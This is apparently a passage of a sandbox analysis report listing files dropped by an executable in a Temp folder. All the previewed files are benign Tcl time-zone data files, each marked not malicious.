                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Toronto) {. {-9223372036854775808 -19052 0 LMT}. {-2366736148 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1609441200 -18000 0 EST}. {-1601753400 -14400 1 EDT}. {-1583697600 -18000 0 EST}. {-1567357200 -14400 1 EDT}. {-1554667200 -18000 0 EST}. {-1534698000 -14400 1 EDT}. {-1524074400 -18000 0 EST}. {-1503248400 -14400 1 EDT}. {-1492365600 -18000 0 EST}. {-1471798800 -14400 1 EDT}. {-1460916000 -18000 0 EST}. {-1440954000 -14400 1 EDT}. {-1428861600 -18000 0 EST}. {-1409504400 -14400 1 EDT}. {-1397412000 -18000 0 EST}. {-1378054800 -14400 1 EDT}. {-1365962400 -18000 0 EST}. {-1346605200 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-1220806800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):202
                                                                                                                                                                                                                                                    Entropy (8bit):4.854311472609309
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Tortola) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9495
                                                                                                                                                                                                                                                    Entropy (8bit):3.7630000632404426
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Vancouver) {. {-9223372036854775808 -29548 0 LMT}. {-2713880852 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-747237600 -25200 1 PDT}. {-732726000 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):201
                                                                                                                                                                                                                                                    Entropy (8bit):4.901732290886438
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Virgin) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7613
                                                                                                                                                                                                                                                    Entropy (8bit):3.789738507183991
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Whitehorse) {. {-9223372036854775808 -32412 0 LMT}. {-2188997988 -32400 0 YST}. {-1632056400 -28800 1 YDT}. {-1615125600 -32400 0 YST}. {-1596978000 -28800 1 YDT}. {-1583164800 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-147884400 -25200 1 YDDT}. {-131554800 -32400 0 YST}. {315561600 -28800 0 PST}. {325677600 -25200 1 PDT}. {341398800 -28800 0 PST}. {357127200 -25200 1 PDT}. {372848400 -28800 0 PST}. {388576800 -25200 1 PDT}. {404902800 -28800 0 PST}. {420026400 -25200 1 PDT}. {436352400 -28800 0 PST}. {452080800 -25200 1 PDT}. {467802000 -28800 0 PST}. {483530400 -25200 1 PDT}. {499251600 -28800 0 PST}. {514980000 -25200 1 PDT}. {530701200 -28800 0 PST}. {544615200 -25200 1 PDT}. {562150800 -28800 0 PST}. {576064800 -25200 1 PDT}. {594205200 -28800 0 PST}. {607514400 -25200 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9379
                                                                                                                                                                                                                                                    Entropy (8bit):3.7354364023000937
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Winnipeg) {. {-9223372036854775808 -23316 0 LMT}. {-2602258284 -21600 0 CST}. {-1694368800 -18000 1 CDT}. {-1681671600 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1029686400 -18000 1 CDT}. {-1018198800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-746035200 -18000 1 CDT}. {-732733200 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620755200 -18000 1 CDT}. {-607626000 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8407
                                                                                                                                                                                                                                                    Entropy (8bit):3.877915398499678
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Yakutat) {. {-9223372036854775808 52865 0 LMT}. {-3225364865 -33535 0 LMT}. {-2188953665 -32400 0 YST}. {-883580400 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-757350000 -32400 0 YST}. {-31503600 -32400 0 YST}. {-21474000 -28800 1 YDT}. {-5752800 -32400 0 YST}. {9975600 -28800 1 YDT}. {25696800 -32400 0 YST}. {41425200 -28800 1 YDT}. {57751200 -32400 0 YST}. {73479600 -28800 1 YDT}. {89200800 -32400 0 YST}. {104929200 -28800 1 YDT}. {120650400 -32400 0 YST}. {126702000 -28800 1 YDT}. {152100000 -32400 0 YST}. {162385200 -28800 1 YDT}. {183549600 -32400 0 YST}. {199278000 -28800 1 YDT}. {215604000 -32400 0 YST}. {230727600 -28800 1 YDT}. {247053600 -32400 0 YST}. {262782000 -28800 1 YDT}. {278503200 -32400 0 YST}. {294231600 -28800 1 YDT}. {309952800 -32400 0 YST}. {325681200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7485
                                                                                                                                                                                                                                                    Entropy (8bit):3.785447517514148
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Yellowknife) {. {-9223372036854775808 0 0 zzz}. {-1104537600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-147891600 -18000 1 MDDT}. {-131562000 -25200 0 MST}. {315558000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {68
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):263
                                                                                                                                                                                                                                                    Entropy (8bit):4.6496354102259465
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Casey) {. {-9223372036854775808 0 0 zzz}. {-31536000 28800 0 AWST}. {1255802400 39600 0 CAST}. {1267714800 28800 0 AWST}. {1319738400 39600 0 CAST}. {1329843600 28800 0 AWST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):318
                                                                                                                                                                                                                                                    Entropy (8bit):4.486342929628561
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Davis) {. {-9223372036854775808 0 0 zzz}. {-409190400 25200 0 DAVT}. {-163062000 0 0 zzz}. {-28857600 25200 0 DAVT}. {1255806000 18000 0 DAVT}. {1268251200 25200 0 DAVT}. {1319742000 18000 0 DAVT}. {1329854400 25200 0 DAVT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):207
                                                                                                                                                                                                                                                    Entropy (8bit):4.841687980121893
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/DumontDUrville) {. {-9223372036854775808 0 0 zzz}. {-725846400 36000 0 PMT}. {-566992800 0 0 zzz}. {-415497600 36000 0 DDUT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2801
                                                                                                                                                                                                                                                    Entropy (8bit):3.8789590757349917
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Macquarie) {. {-9223372036854775808 0 0 zzz}. {-2214259200 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-1601719200 0 0 zzz}. {-94730400 36000 0 AEST}. {-71136000 39600 1 AEDT}. {-55411200 36000 0 AEST}. {-37267200 39600 1 AEDT}. {-25776000 36000 0 AEST}. {-5817600 39600 1 AEDT}. {5673600 36000 0 AEST}. {25632000 39600 1 AEDT}. {37728000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.828936781959796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Mawson) {. {-9223372036854775808 0 0 zzz}. {-501206400 21600 0 MAWT}. {1255809600 18000 0 MAWT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.832254042797831
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2504
                                                                                                                                                                                                                                                    Entropy (8bit):3.9021405085103424
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Palmer) {. {-9223372036854775808 0 0 zzz}. {-157766400 -14400 0 ART}. {-152654400 -14400 0 ART}. {-132955200 -10800 1 ARST}. {-121122000 -14400 0 ART}. {-101419200 -10800 1 ARST}. {-86821200 -14400 0 ART}. {-71092800 -10800 1 ARST}. {-54766800 -14400 0 ART}. {-39038400 -10800 1 ARST}. {-23317200 -14400 0 ART}. {-7588800 -10800 0 ART}. {128142000 -7200 1 ARST}. {136605600 -10800 0 ART}. {389070000 -14400 0 CLT}. {403070400 -10800 1 CLST}. {416372400 -14400 0 CLT}. {434520000 -10800 1 CLST}. {447822000 -14400 0 CLT}. {466574400 -10800 1 CLST}. {479271600 -14400 0 CLT}. {498024000 -10800 1 CLST}. {510721200 -14400 0 CLT}. {529473600 -10800 1 CLST}. {545194800 -14400 0 CLT}. {560923200 -10800 1 CLST}. {574225200 -14400 0 CLT}. {592372800 -10800 1 CLST}. {605674800 -14400 0 CLT}. {624427200 -10800 1 CLST}. {637124400 -14400 0 CLT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):146
                                                                                                                                                                                                                                                    Entropy (8bit):4.897451485949667
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Rothera) {. {-9223372036854775808 0 0 zzz}. {218246400 -10800 0 ROTT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                                                                                    Entropy (8bit):4.858829912809126
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                    Entropy (8bit):4.870240083017443
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Syowa) {. {-9223372036854775808 0 0 zzz}. {-407808000 10800 0 SYOT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5269
                                                                                                                                                                                                                                                    Entropy (8bit):3.772419187902428
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Troll) {. {-9223372036854775808 0 0 zzz}. {1108166400 0 0 UTC}. {1111885200 7200 1 CEST}. {1130634000 0 0 UTC}. {1143334800 7200 1 CEST}. {1162083600 0 0 UTC}. {1174784400 7200 1 CEST}. {1193533200 0 0 UTC}. {1206838800 7200 1 CEST}. {1224982800 0 0 UTC}. {1238288400 7200 1 CEST}. {1256432400 0 0 UTC}. {1269738000 7200 1 CEST}. {1288486800 0 0 UTC}. {1301187600 7200 1 CEST}. {1319936400 0 0 UTC}. {1332637200 7200 1 CEST}. {1351386000 0 0 UTC}. {1364691600 7200 1 CEST}. {1382835600 0 0 UTC}. {1396141200 7200 1 CEST}. {1414285200 0 0 UTC}. {1427590800 7200 1 CEST}. {1445734800 0 0 UTC}. {1459040400 7200 1 CEST}. {1477789200 0 0 UTC}. {1490490000 7200 1 CEST}. {1509238800 0 0 UTC}. {1521939600 7200 1 CEST}. {1540688400 0 0 UTC}. {1553994000 7200 1 CEST}. {1572138000 0 0 UTC}. {1585443600 7200 1 CEST}. {1603587600 0 0 UTC}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):145
                                                                                                                                                                                                                                                    Entropy (8bit):4.889998800024563
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Vostok) {. {-9223372036854775808 0 0 zzz}. {-380073600 21600 0 VOST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.922114908130109
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Oslo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):166
                                                                                                                                                                                                                                                    Entropy (8bit):4.7788335911117095
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Riyadh)]} {. LoadTimeZoneFile Asia/Riyadh.}.set TZData(:Asia/Aden) $TZData(:Asia/Riyadh).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1627
                                                                                                                                                                                                                                                    Entropy (8bit):3.956903784715755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Almaty) {. {-9223372036854775808 18468 0 LMT}. {-1441170468 18000 0 ALMT}. {-1247547600 21600 0 ALMT}. {354909600 25200 1 ALMST}. {370717200 21600 0 ALMT}. {386445600 25200 1 ALMST}. {402253200 21600 0 ALMT}. {417981600 25200 1 ALMST}. {433789200 21600 0 ALMT}. {449604000 25200 1 ALMST}. {465336000 21600 0 ALMT}. {481060800 25200 1 ALMST}. {496785600 21600 0 ALMT}. {512510400 25200 1 ALMST}. {528235200 21600 0 ALMT}. {543960000 25200 1 ALMST}. {559684800 21600 0 ALMT}. {575409600 25200 1 ALMST}. {591134400 21600 0 ALMT}. {606859200 25200 1 ALMST}. {622584000 21600 0 ALMT}. {638308800 25200 1 ALMST}. {654638400 21600 0 ALMT}. {662666400 21600 0 ALMT}. {694202400 21600 0 ALMT}. {701802000 25200 1 ALMST}. {717523200 21600 0 ALMT}. {733262400 25200 1 ALMST}. {748987200 21600 0 ALMT}. {764712000 25200 1 ALMST}. {780436800 21600 0 ALMT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7055
                                                                                                                                                                                                                                                    Entropy (8bit):3.621680472512772
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Amman) {. {-9223372036854775808 8624 0 LMT}. {-1230776624 7200 0 EET}. {108165600 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {215643600 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EET}. {262735200 10800 1 EEST}. {275950800 7200 0 EET}. {481154400 10800 1 EEST}. {496962000 7200 0 EET}. {512949600 10800 1 EEST}. {528670800 7200 0 EET}. {544399200 10800 1 EEST}. {560120400 7200 0 EET}. {575848800 10800 1 EEST}. {592174800 7200 0 EET}. {610581600 10800 1 EEST}. {623624400 7200 0 EET}. {641167200 10800 1 EEST}. {655074000 7200 0 EET}. {671839200 10800 1 EEST}. {685918800 7200 0 EET}. {702856800 10800 1 EEST}. {717973200 7200 0 EET}. {733701600 10800 1 EEST}. {749422800 7200 0 EET}. {765151200 10800 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2126
                                                                                                                                                                                                                                                    Entropy (8bit):3.9059727754043094
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Anadyr) {. {-9223372036854775808 42596 0 LMT}. {-1441194596 43200 0 ANAT}. {-1247572800 46800 0 ANAMMTT}. {354884400 50400 1 ANAST}. {370692000 46800 0 ANAT}. {386420400 43200 0 ANAMMTT}. {386424000 46800 1 ANAST}. {402231600 43200 0 ANAT}. {417960000 46800 1 ANAST}. {433767600 43200 0 ANAT}. {449582400 46800 1 ANAST}. {465314400 43200 0 ANAT}. {481039200 46800 1 ANAST}. {496764000 43200 0 ANAT}. {512488800 46800 1 ANAST}. {528213600 43200 0 ANAT}. {543938400 46800 1 ANAST}. {559663200 43200 0 ANAT}. {575388000 46800 1 ANAST}. {591112800 43200 0 ANAT}. {606837600 46800 1 ANAST}. {622562400 43200 0 ANAT}. {638287200 46800 1 ANAST}. {654616800 43200 0 ANAT}. {670341600 39600 0 ANAMMTT}. {670345200 43200 1 ANAST}. {686070000 39600 0 ANAT}. {695746800 43200 0 ANAMMTT}. {701780400 46800 1 ANAST}. {717501600 43200 0 ANAT}. {733240800 46800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1684
                                                                                                                                                                                                                                                    Entropy (8bit):3.971554616694357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtau) {. {-9223372036854775808 12064 0 LMT}. {-1441164064 14400 0 FORT}. {-1247544000 18000 0 FORT}. {-220942800 18000 0 SHET}. {370724400 21600 0 SHET}. {386445600 18000 0 SHET}. {386449200 21600 1 SHEST}. {402256800 18000 0 SHET}. {417985200 21600 1 SHEST}. {433792800 18000 0 SHET}. {449607600 21600 1 SHEST}. {465339600 18000 0 SHET}. {481064400 21600 1 SHEST}. {496789200 18000 0 SHET}. {512514000 21600 1 SHEST}. {528238800 18000 0 SHET}. {543963600 21600 1 SHEST}. {559688400 18000 0 SHET}. {575413200 21600 1 SHEST}. {591138000 18000 0 SHET}. {606862800 21600 1 SHEST}. {622587600 18000 0 SHET}. {638312400 21600 1 SHEST}. {654642000 18000 0 SHET}. {662670000 18000 0 SHET}. {692823600 18000 0 AQTT}. {701805600 21600 1 AQTST}. {717526800 18000 0 AQTT}. {733266000 21600 1 AQTST}. {748990800 18000 0 AQTT}. {764715600 21600 1 AQTST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1656
                                                                                                                                                                                                                                                    Entropy (8bit):3.8964942154031177
                                                                                                                                                                                                                                                    Encrypted:false
